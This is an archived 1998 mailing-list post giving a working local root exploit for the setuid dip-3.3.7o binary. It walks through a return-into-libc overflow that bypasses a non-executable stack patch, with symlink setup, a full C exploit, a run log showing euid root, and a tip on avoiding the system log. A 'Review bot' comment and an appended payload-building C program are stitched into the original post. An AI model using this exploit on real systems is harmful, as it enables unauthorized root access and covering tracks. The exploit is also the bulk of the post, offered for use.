Cooking with the right dip(-3.3.7o)

From: Thomas Troeger (tstroegeat_private-ERLANGEN.DE)
Date: Tue May 12 1998 - 15:17:35 PDT


    Hi,
    
    After reading jamez's and zef's postings about dip and reviewing
    its source code, I recalled Rafal Wojtczuk (nergal)'s post about defeating
    Solar Designer's non-executable stack. I asked myself "Hmmm, let's see if
    we can get a shell out of it even on a system with the stackpatch installed."
    
    So I developed the following recipe:
    
    First, setup your directory like this:
    
    -----------------------------------------------------------
    # one /bin/sh symlink per possible command length: the filler string in
    # baguette.c is "aaaaaaa;", so the first token the shell sees is 1 to 7
    # 'a's depending on where SOMESTACK lands inside it
    ln -s /bin/sh a
    ln -s /bin/sh aa
    ln -s /bin/sh aaa
    ln -s /bin/sh aaaa
    ln -s /bin/sh aaaaa
    ln -s /bin/sh aaaaaa
    ln -s /bin/sh aaaaaaa
    
    # the setuid dip binary, under the name baguette.c execve()s
    ln -s /usr/sbin/dip vul
    -----------------------------------------------------------
    
    Get the dip-3.3.7o-uri package and uncompress it. Take main.c and edit
    it as follows (preferably with vi !! :) ):
    
    ------------------ dip-3.3.7o/main.c line 194+ -----------------------------
        fp = fopen(buf, "r");
        if (fp == (FILE *)0) {
        fprintf(stderr, "DIP: cannot open %s: %s\n",
            buf, strerror(errno));
    +   fprintf(stderr, "labels: %p %p\n", &system, nam);
            return;
        }
    ----------------------------------------------------------------------------
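    Review bot: the added line takes the address of system, so a declaration of system must be in scope at that point, or the build stops on an undeclared identifier (implicit declaration only covers calls, not &system); if main.c does not already include <stdlib.h>, add that include along with this debugging line, and remember to drop both again once the addresses have been noted, since this is a probe, not a fix.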
    
    Of course you can just use gdb and issue the "p system" command as well, which
    avoids getting the package.
    
    Now compile and run it, you get:
    
    ----------------------------------------------------------------------------
    pigsnspace$ dip -k -l aaaa
    DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
    Written by Fred N. van Kempen, MicroWalt Corporation.
    
    DIP: cannot open /usr/spool/uucp/LCK..aaaa: No such file or directory
    labels: 0x80493e8 0xbffff6f0
    ----------------------------------------------------------------------------
    
    Insert the first number you get into the following exploit:
    
    --------------------------  baguette.c  --------------------------------
    /*
     * Program to get a shell from dip-3.3.7o-uri on a system with
     * Solar Designer's stackpatch installed.
     * by tstroegeat_private-erlangen.de
     * credits to jamez, zef and especially
     * Rafal Wojtczuk for his howto ;)
     *
     * Of course this is just for educational purposes :)
     */
    
    #include <stdio.h>
    #include <stdlib.h>     /* atoi */
    #include <string.h>     /* memcpy, strcpy, strlen */
    #include <unistd.h>     /* execve */
    
    #define SYSTEM  0x80493e8
    /* address of system entry */
    #define SOMESTACK       0xbffffea0
    /* address on stack where argv[1] should be. Usually somewhere on top */
    
    int main(int argc, char *argv[]) {
            char *name[]={"./vul", "-k", "-l", NULL, NULL};
            char mem[1024], *ptr;
            /* frame that lands on the saved return address: &system, the
             * fake return address system() returns to, and the pointer
             * system() gets as its argument (int holds a 32-bit address on
             * the i386 target; the trailing 0 terminates the strcpy below) */
            int i, code[]={ SYSTEM, SOMESTACK, SOMESTACK, 0 }, off;
    
            if (argc < 2) {
                    fprintf(stderr, "usage: %s offset\n", argv[0]);
                    return 1;
            }
            off=atoi(argv[1]);
            if (off < 0 || off > 1024 - (int)sizeof(code)) {
                    fprintf(stderr, "offset out of range\n");
                    return 1;
            }
    
            /* filler: 7-char command names separated by ';', so whatever
             * SOMESTACK points at inside it is one of the symlinks a..aaaaaaa */
            for (ptr=mem, i=0; i < 1024; i+=8, ptr+=8) memcpy(ptr, "aaaaaaa;", 8);
            ptr=mem+off;
            strcpy(ptr, (char *)&(code[0]));  /* 12 address bytes, none of them NUL */
            mem[1023]=0;
            name[3]=(char *)mem;
            printf("%s (%d/%d)\n", mem, (int)strlen(mem), off);
            execve(name[0], name, NULL);
            perror("execve");
            return 1;
    }
    ----------------------------------------------------------------------
    (SOMESTACK is somewhere above 0xbffff6f0, here it was 0xbffffea0)
    
    Running this program should do. On my platform offset 113 did the job:
    
    ----------------------------------------------------------------------
    pigsnspace$ gcc baguette.c -o exp
    pigsnspace$ id
    uid=1047(piggy) gid=100(users) groups=100(users)
    pigsnspace$ ./exp 113
    aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aè þÿ¿ þÿ¿ (125/113)
    DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
    Written by Fred N. van Kempen, MicroWalt Corporation.
    
    DIP: cannot open /var/lock/LCK..aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aè þÿ¿ þÿ¿: No such file or directory
    pigsnspace# id
    uid=1047(piggy) gid=100(users) euid=0(root) groups=100(users)
    ----------------------------------------------------------------------
    
    Well, so much for this. You should keep in mind that getting the right offset
    value (the 113 somewhere above) and the addresses of SYSTEM and SOMESTACK can
    be difficult. Most probably this program will not work at once (see more about
    it in nergal's article). Those values worked here, but you will have to
    experiment.
    
    After exiting the neat shells, you'll get a system log. So you should
    maybe just kill them using kill ......
    
            tst.
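
    As an added example (not from the original post, and not dip's or the
    author's code), the following C program builds the same payload layout
    that baguette.c hands dip through -l and checks, without running anything
    setuid, the two things the recipe relies on: that the three-word
    return-into-libc frame lands intact at the chosen offset (the post's
    "125/113" is the strlen of exactly this layout), and which of the
    a .. aaaaaaa symlinks the shell would actually run depending on where the
    SOMESTACK pointer happens to land inside the "aaaaaaa;" filler. The
    addresses and offset 113 are the post's sample values and the 32-bit
    little-endian layout is assumed, as in the post; both will differ
    elsewhere.

```c
/*
 * Added example, not part of the original post: builds the return-into-libc
 * payload shape used by baguette.c and checks its properties offline.
 * Assumed: 32-bit little-endian target, as in the post. The addresses and
 * the offset 113 are the post's sample values, not portable constants.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD_LEN 1024
#define FILLER "aaaaaaa;"   /* 7-char command name plus ';' separator */

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff;          p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff;  p[3] = (v >> 24) & 0xff;
}

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/*
 * Fill buf with the repeating filler, then place at `off` the frame that
 * overwrites the saved return address: &system, a fake return address for
 * system() to return to, and the pointer system() takes as its argument.
 * Returns 1 on success, 0 if the frame would not fit or if any address
 * contains a NUL byte: a strcpy()-style copy (the one in baguette.c, and
 * the unbounded copy in dip that gets overflowed) stops at the first NUL.
 */
static int build_payload(unsigned char *buf, size_t off,
                         uint32_t system_addr, uint32_t ret_addr,
                         uint32_t arg_addr)
{
    const uint32_t frame[3] = { system_addr, ret_addr, arg_addr };
    size_t i;

    if (off + 12 >= PAYLOAD_LEN)
        return 0;
    for (i = 0; i + 8 <= PAYLOAD_LEN; i += 8)
        memcpy(buf + i, FILLER, 8);
    for (i = 0; i < 3; i++) {
        unsigned char tmp[4];
        put_le32(tmp, frame[i]);
        if (memchr(tmp, 0, 4) != NULL)
            return 0;
        memcpy(buf + off + 4 * i, tmp, 4);
    }
    buf[off + 12] = 0;   /* where the copy's terminator ends up */
    return 1;
}

/* Read back word n (0..2) of the frame placed at `off`, for checking. */
static uint32_t frame_word(const unsigned char *buf, size_t off, int n)
{
    return get_le32(buf + off + 4 * n);
}

/*
 * system() runs "/bin/sh -c <string>" on whatever arg_addr points at. The
 * exploit cannot choose where inside the filler that pointer lands, so the
 * first command sh parses is 1 to 7 'a's depending on alignment, which is
 * why the post symlinks a, aa, ..., aaaaaaa to /bin/sh. Copy the first
 * ';'-delimited token starting at `start` into tok and return its length;
 * length 0 means the string begins with ';', which sh rejects as a syntax
 * error, so one alignment in eight still fails.
 */
static size_t first_token(const unsigned char *buf, size_t start,
                          char *tok, size_t tok_sz)
{
    size_t n = 0;
    while (start + n < PAYLOAD_LEN && n + 1 < tok_sz &&
           buf[start + n] != ';' && buf[start + n] != 0) {
        tok[n] = (char)buf[start + n];
        n++;
    }
    tok[n] = 0;
    return n;
}

int main(void)
{
    unsigned char buf[PAYLOAD_LEN];
    char tok[16];
    size_t s;

    if (!build_payload(buf, 113, 0x80493e8u, 0xbffffea0u, 0xbffffea0u)) {
        puts("payload rejected");
        return 1;
    }
    printf("frame at 113: %#x %#x %#x, strlen %zu\n",
           (unsigned)frame_word(buf, 113, 0), (unsigned)frame_word(buf, 113, 1),
           (unsigned)frame_word(buf, 113, 2), strlen((char *)buf));
    for (s = 0; s < 8; s++) {
        first_token(buf, s, tok, sizeof tok);
        printf("string starts at filler byte %zu: first command '%s'\n", s, tok);
    }
    return 0;
}
```

    The NUL check is the part worth keeping in mind when porting: a system()
    address such as 0x08049300 would silently truncate the frame after the
    first byte, and the only symptom would be a crash instead of a shell.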
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:53:24 PDT